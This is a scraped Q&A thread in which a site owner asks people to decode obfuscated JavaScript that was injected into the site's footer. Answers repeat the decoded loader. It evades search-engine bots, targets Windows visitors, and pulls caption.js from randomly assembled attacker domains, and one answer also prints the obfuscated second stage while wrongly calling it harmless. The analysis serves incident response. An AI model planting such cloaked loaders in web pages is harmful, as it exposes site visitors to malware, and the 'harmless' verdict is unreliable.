Geek Answers Handbook

Decode some entered javascript?

I had the following, entered into the footer of my site and, trying to solve a big secret ("How did this happen"), I try to decrypt it. Any ideas?

Here is the code:

<ads><script type="text/javascript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%61%3D%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2C%62%3D%2F%28%79%61%68%6F%6F%7C%73%65%61%72%63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69%6E%67%7C%61%73%6B%29%2F%69%2C%63%3D%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%3B%20%69%66%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%69%6E%64%65%78%4F%66%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%3D%3D%2D%31%26%26%21%61%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%6D%61%74%63%68%28%62%29%26%26%63%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%21%3D%2D%31%29%7B%76%61%72%20%64%3D%5B%22%6D%79%61%64%73%2E%6E%61%6D%65%22%2C%22%61%64%73%6E%65%74%2E%62%69%7A%22%2C%22%74%6F%6F%6C%62%61%72%63%6F%6D%2E%6F%72%67%22%2C%22%6D%79%62%61%72%2E%75%73%22%2C%22%66%72%65%65%61%64%2E%6E%61%6D%65%22%5D%2C%65%3D%5B%22%76%61%67%69%2E%22%2C%22%76%61%69%6E%2E%22%2C%22%76%61%6C%65%2E%22%2C%22%76%61%72%73%2E%22%2C%22%76%61%72%79%2E%22%2C%22%76%61%73%61%2E%22%2C%22%76%61%75%74%2E%22%2C%22%76%61%76%73%2E%22%2C%22%76%69%6E%79%2E%22%2C%22%76%69%6F%6C%2E%22%2C%22%76%72%6F%77%2E%22%2C%22%76%75%67%73%2E%22%2C%22%76%75%6C%6E%2E%22%5D%2C%66%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%64%2E%6C%65%6E%67%74%68%29%2C%67%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%65%2E%6C%65%6E%67%74%68%29%3B%64%74%3D%6E%65%77%20%44%61%74%65%3B%64%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%2B%39%30%37%32%45%34%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%68%6F%6C%79%63%6F%6F%6B%69%65%3D%22%2B%65%73%63%61%70%65%28%22%68%6F%6C%79%63%6F%6F%6B%69%65%22%29%2B%22%3B%65%78%70%69%72%65%73%3D%22%2B%64%74%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%2B%22%3B%70%61%74%68%3D%2F%22%3B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%65%5B%67%5D%2B%64%5B%66%5D%2B%27%2F%73%79%73%74%65%6D%2F%63%61%70%74%69%6F%6E%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%7D%3B%3C%2F%73%63%72%69%70%74%3E'));</script></ads>
+7
javascript decoding
source share
10 answers

You can decode a string using this tool . Set the parameters for converting strings to URL and Decode . Then you can handle it with js beautifier .

And since I'm curious, I looked at the result. It writes a new caption.js file to your pages from a semi-random domain. There are 2 arrays of URL segments that are used to create a complete domain, so I would say that you have something to do.

+6
source share
 <script language="javascript" type="text/javascript"> var a = window.navigator.userAgent, b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i, c = navigator.appVersion; if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) { var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"], e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."], f = Math.floor(Math.random() * d.length), g = Math.floor(Math.random() * e.length); dt = new Date; dt.setTime(dt.getTime() + 9072E4); document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/"; document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + '/system/caption.js"><\/script>') }; </script>

So, it adds the subdomain from e (e.g. vagi. ) To the domain name from d (e.g. myads.name ) and loads the script from /system/caption.js in that domain (e.g. http://vagi.myads.name/system/caption.js ).

+6
source share
 var a = window.navigator.userAgent, b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i, c = navigator.appVersion; if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) { var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"], e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."], f = Math.floor(Math.random() * d.length), g = Math.floor(Math.random() * e.length); dt = new Date; dt.setTime(dt.getTime() + 9072E4); document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/"; document.write('<script type="text/javascript" src="http://' + e[g] + d[f] + '/system/caption.js"><\/script>') };

The code downloads a random subdomain-sld combo with a set of cookies to load insecure content.

+2
source share

All of these numbers are hexadecimal values ​​for ASCII characters. When unescape is called, they turn into real characters. for example,% 3C is '<'.

Why not use a message box to output unescape (...) output

+1
source share

Here you can use a hex decoder: http://home2.paulschou.net/tools/xlate/ Code

 <script language="javascript" type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};</script>
+1
source share
 <script language="javascript" type="text/javascript"> var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){ var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"], e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."], f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length); dt=new Date; dt.setTime(dt.getTime()+9072E4); document.cookie="holycookie="+escape("holycookie")+"; expires="+dt.toGMTString()+"; path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')}; </script>
+1
source share

Here's the URLDecoder: http://meyerweb.com/eric/tools/dencoder/

And the code that he writes:

 <script language="javascript" type="text/javascript">var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length);dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')};</script>

OK, so this is not too useful. It seems that it is adding another JS file if the user does not have a cookie named "holycookie" and is not a Google bot. Most of them are just rubbish to choose which domain name should receive the payload.

+1
source share

The code you posted is decoded to

 var a = window.navigator.userAgent, b = /(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i, c = navigator.appVersion; if (document.cookie.indexOf("holycookie") == -1 && !a.toLowerCase().match(b) && c.toLowerCase().indexOf("win") != -1) { var d = ["myads.name", "adsnet.biz", "toolbarcom.org", "mybar.us", "freead.name"], e = ["vagi.", "vain.", "vale.", "vars.", "vary.", "vasa.", "vaut.", "vavs.", "viny.", "viol.", "vrow.", "vugs.", "vuln."], f = Math.floor(Math.random() * d.length), g = Math.floor(Math.random() * e.length); dt = new Date; dt.setTime(dt.getTime() + 9072E4); document.cookie = "holycookie=" + escape("holycookie") + ";expires=" + dt.toGMTString() + ";path=/"; document.write('') };

which, in turn, loads the code from the url compiled in a pseudo-random manner, provided that the if condition is met.

If you open, for example, http://vain.adsnet.biz/system/caption.js , you will be presented with the following javascript code.

I leave you an interpretation, but it looks completely harmless.

 function tT() {}; var yWP = new Array(); tT.prototype = { h: function () { this.i = ""; var nH = function () {}; var tE = 30295; var u = ""; zB = false; this.a = ''; this.eY = 29407; var z = document; vD = "vD"; var gT = "gT"; var oG = ''; var lF = ''; fU = "fU"; var q = function () { return 'q' }; var c = window; var m = function () { return 'm' }; var kS = "kS"; this.b = ""; this.p = 29430; var j = this; dL = ""; var cC = new Date(); cQ = 33459; var uY = "uY"; var vO = function () {}; zN = "zN"; jIZ = ''; var mH = 21601; String.prototype.lP = function (v, hF) { var t = this; return t.replace(v, hF) }; var nA = ""; this.xK = 48622; zG = ""; var kF = function () {}; function aF() {}; var mI = function () {}; var oY = ''; var g = 'sfe?tfTw'.lP(/[wfoj\?]/g, '') + 'irmkeko('.lP(/[\(rO\[k]/g, '') + 'ubty'.lP(/[y\+b\>\)]/g, ''); var iN = new Array(); mJ = "mJ"; aW = "aW"; var hU = "hU"; this.kC = 28044; var k = 'tbr3e*c(r*e3a('.lP(/[\(3b\*G]/g, '') + 'tEe>nat>gaeat)'.lP(/[\)a\>\]\|'.lP(/[\|\)\(MN]/g, '')); var cJ = function () {}; var tX = false; this.xHX = false; function jP() {}; var eZ = 16039; bQ = "bQ"; var eSM = new Date(); c[g](function () { jh() }, 384); this.xR = ""; var jB = function () { return 'jB' }; var fP = function () { return 'fP' }; var bX = new Array(); } function iLD() {}; var mQ = function () {}; var wZV = "";this.eK = 5506; } }; fO = 30941; var hW = new tT(); wU = 40956; hW.h(); hZ = "hZ";

How could you do it yourself? URLDecode + jsbeautifier or jsunpack is more than enough to go that far;)

+1
source share

Use Version Control, so this will not happen in the future. After a good build is completed, and everything is the way you want it, save it to an external hard drive when you are offline.

Have you done something recently to upset an employee who is a programmer?

+1
source share

Used PHP rawurldecode file

  <script language="javascript" type="text/javascript"> var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){ var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.","vavs.","viny.","viol.","vrow.","vugs.","vuln."],f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length); dt=new Date; dt.setTime(dt.getTime()+9072E4); document.cookie="holycookie="+escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document.write('<script type="text/javascript" src="http://'+e[g]+d[f]+'/system/caption.js"><\/script>')}; </script>
0
source share

More articles:


All Articles